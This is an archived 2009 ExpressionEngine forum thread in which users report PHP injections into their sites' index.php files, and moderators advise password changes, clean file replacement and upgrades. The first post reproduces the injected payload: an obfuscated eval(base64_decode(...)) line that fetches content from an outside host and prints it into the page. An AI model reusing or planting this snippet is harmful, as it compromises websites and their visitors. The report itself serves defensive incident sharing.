We use cookies to help make our site work properly and to analyze how our site is used. Some are optional, but none contain your personal information, and we don't use any for ads. You can view our cookies policy, manage your cookie preferences, or consent and dismiss this banner by clicking agree:

Agree
ExpressionEngine CMS
Open, Free, Amazing

Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

EE PHP Exploit Found.

November 10, 2009 3:55pm

Subscribe [10]

  • #1 / Nov 10, 2009 3:55pm

    sahadeva

    14 posts

    Just wanted to let you guys know that two of my sites were recently taken offline due to a php injection into the index.php files in EE (running 1.6.8 and 1.5.2).

    Here was the error I received when loading one of the sites:

    Parse error: syntax error, unexpected T_STRING in /nfs/c02/h06/mnt/15909/domains/sahadeva.com/html/index.php on line 60

    Here was the code being injected into the site: 

    <!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

    I removed the code, updated the passwords for my EE install and FTP accounts. Things seem to be working again now - anything I can do besides changing my passwords?

    Mod Edit: Moved to the Technical Support Forum

  • #2 / Nov 10, 2009 4:04pm

    Ingmar

    29245 posts

    Thank your for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. We need some additional information from you.

    Is that a version of EE Core? What exact version and build are we dealing with? Do you have any other scripts on your account, whether in use or not (phpBB, etc…)

    If this is a shared hosting environment, the host can help us find the vector of attack. These attacks quite often start with some other script, even some other account on the server and spread from there.

    To that, what is being hacked and changed? If you look through:

    - path.php
    - config.php
    - index.php

    Do you see malicious code being put in there or in other locations?

    My suggestion would be to upgrade all installs to the latest version and build, completely replacing all files with known good copies, and change all of your passwords.

    Although I have no reason to think this an issue with EE, we would very much like to get to the bottom of it.

  • #3 / Nov 23, 2009 2:47am

    leegreen

    29 posts

    Hi -
    I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
    And thoughts on how I can stop this occurring again?

    One site is running 1.6.7 and the other is latest 1.6.8 build.

  • #4 / Nov 23, 2009 3:37am

    Ingmar

    29245 posts

    I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
    And thoughts on how I can stop this occurring again?

    Please understand that we have no reason to assume this to be an issue with EE. What we recommend in cases like that is to notify your host and work with them to understand how this break-in occurred, change all of your passwords (EE, FTP, MySQL) and replace all of your files with known good copies downloaded from our site, upgrading to the latest version and build in the process if you haven’t done so.

    One site is running 1.6.7 and the other is latest 1.6.8 build.

    Yes, we always recommend to use the latest major version for security reasons. Even so, the recent series of events was a problem with MT (and limited to their servers).

  • #5 / Nov 25, 2009 6:48pm

    HEX32 Web Design

    8 posts

    This happened today to my client’s website while I was working in the Control Panel! ... “I just popped out the back for a few minutes and when I returned someone had stolen all my stuff!”

    No website (index.php “Parse error: syntax error, unexpected T_STRING in /nfs/c04/h04/mnt/67006/domains/zok.com/html/index.php on line 61” )

    Removed code, pushed up new clean page and website back online.
    Checked for other signs of intrusion - nothing.
    Passwords being changed.

    FYI (1.6.7 build 111) They have the 1.6.8 stuff to upgrade but we resisted while we worked towards a launch three weeks ago.
    Maybe we need to move to 1.6.8 this weekend, just to be on the safe side?

    We have informed (mt) of the ‘break-in’. Still awaiting their reply.

    Another (mt) (grid server)hosted site - so there is a pattern.

    I got an email today from them, about my own account, not the client’s one.

    Priority maintenance on DVS platform

    To address a potentially critical security hole in the DVS platform, it
    was necessary to restart all the VSes in order to enable the software
    fix.

    This restart was performed as a matter of urgent priority during the
    early hours of Wednesday 25th November 2009.

    Let’s hope they ‘fess up - after all we all make mistake sometime - its just embarrassing and damaging after I recommended them after giving me 5 years rock solid web support.

    Ho hum…

  • #6 / Nov 25, 2009 6:53pm

    Adam Dorsey

    1439 posts

    Hi HEX32-
    Thanks for reporting this. If you hear anything back from Media Temple, please let us know.

    In regards to upgrading to 1.6.8. While this security issue is almost certainly a Media Temple issue, we certainly recommend upgrading to 1.6.8, as it has some important fixes and security updates.

    Thanks again for keeping us informed!

.(JavaScript must be enabled to view this email address)

ExpressionEngine News!

#eecms, #events, #releases

© Packet Tide, All Rights Reserved. Legal Notices

Username

Password

Forgot password?
or Register